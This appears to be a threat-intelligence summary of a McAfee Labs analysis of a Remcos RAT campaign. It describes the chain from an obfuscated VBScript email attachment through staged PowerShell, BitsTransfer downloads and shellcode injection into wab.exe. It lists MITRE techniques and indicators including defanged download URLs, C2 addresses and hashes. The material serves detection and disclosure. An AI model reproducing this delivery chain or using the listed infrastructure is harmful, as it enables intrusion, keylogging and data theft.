McAfee Labs describes a sophisticated VBScript-driven campaign that began with AgentTesla and now distributes Remcos RAT along with other malware like Guloader, Xworm, and Lokibot. The attack chain uses obfuscated VBS, staged PowerShell, reflective shellcode loading, and a wab.exe host to execute the final Remcos payload; it targets users worldwide. #AgentTesla #RemcosRAT #Guloader #Xworm #Lokibot
Keypoints
- Initial attack uses a heavily obfuscated VBScript attached in email delivery to distribute malware.
- The infection progresses from a VBS file to staged PowerShell phases, with BitsTransfer fetching a second-stage script.
- Second-stage PowerShell is base64 encoded and decoded, with multiple shellcodes loaded and executed reflectively.
- Final payload (Remcos RAT) is downloaded and injected into wab.exe, enabling remote control and data collection.
- Shellcode loading includes decryption loops, memory writes, and process injection techniques to evade detection.
- The campaign includes a global reach, evidenced by a geo heatmap of targeted McAfee customers over three months.
MITRE Techniques
- [T1059.005] VBScript – The campaign begins with a heavily obfuscated VBS file attached in email. ‘Attached to the email is a ZIP file seemingly labeled as “revised_quotation_for_purchase_invoice_order_design_6th_november_2023”, resembling an invoice to the user.’
- [T1059.001] PowerShell – Execution moves from the VBS to first-stage PowerShell and then to a second-stage PowerShell. ‘The execution begins by running a VBS script. then it triggers the execution of the first-stage PowerShell. Subsequently, the BitsTransfer utility is employed to fetch a second-stage PowerShell which is base64 encoded.’
- [T1105] Ingress Tool Transfer – BitsTransfer is used to fetch the second-stage PowerShell. ‘Retrieves the second-level file from “hxxp://103.176.111[.]163/mundhul.pfb” using BitsTransfer.’
- [T1140] Deobfuscation/Decode Data – The script deobfuscates and decodes embedded data to reveal the final payload. ‘After deobfuscating the code’ and ‘the entire script is decoded…’
- [T1055] Process Injection – Shellcode B is injected into wab.exe to execute the final payload. ‘The shellcode is designed to establish a new process named “wab.exe” and it replicates 0x3FC4000 bytes of decrypted shellcode into its memory space. … subsequently injected into the wab.exe process’
- [T1095] Non-Application Layer Protocol – C2 communications with an external IP/Port. ‘connects to the IP address 94.156.65.197 through port 2404.’
- [T1056.001] Keylogging – Keystrokes are captured and stored. ‘Data keylogged during its operation is stored in a file labeled “logs.dat.”’
Indicators of Compromise
- [File hash] VBS/Final payload – 6fdd246520eebb59e37a7cd544477567b405a11e118b7754ff0d4a89c01251e4, and 7d947df412e78a595029121ecaf9d8a88e69175cffd1f2d75d31e3ca8995c978
- [URL] Command and control/download locations – hxxp://103.176.111[.]163/mundhul.pfb, hxxp://103.176.111[.]163/lnHxQotdQb132.bin
- [IP address] Command-and-control destinations – 103.176.111[.]163, 94.156.65[.]197
- [Mutex] Single-instance or synchronization – Rmc-R7V4VM